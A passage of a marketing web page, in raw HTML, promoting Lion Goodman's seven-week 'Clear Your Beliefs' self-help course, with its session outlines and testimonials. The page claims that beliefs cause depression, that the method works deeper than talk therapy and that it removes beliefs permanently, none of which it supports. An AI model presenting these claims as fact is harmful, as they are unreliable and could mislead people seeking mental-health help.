<em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m 